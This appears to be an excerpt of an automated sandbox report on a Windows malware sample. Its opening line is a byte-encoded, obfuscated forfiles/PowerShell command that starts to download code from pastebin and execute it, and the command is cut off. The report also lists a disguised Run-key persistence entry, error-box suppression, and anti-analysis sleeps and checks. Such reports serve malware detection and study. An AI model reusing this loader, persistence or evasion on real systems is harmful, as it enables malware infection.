92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FFB1137E152 rdtsc 18_2_00007FFB1137E152
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2894
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4298
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5133
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4544
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll
Source: C:\Users\user\Desktop\Lm9IJ4r9oO.exe API coverage: 7.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7976 Thread sleep count: 4298 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep count: 5459 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8008 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696 Thread sleep count: 2249 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep count: 5133 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144 Thread sleep count: 4544 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3036 Thread sleep time: -15679732462653109s >= -30000s
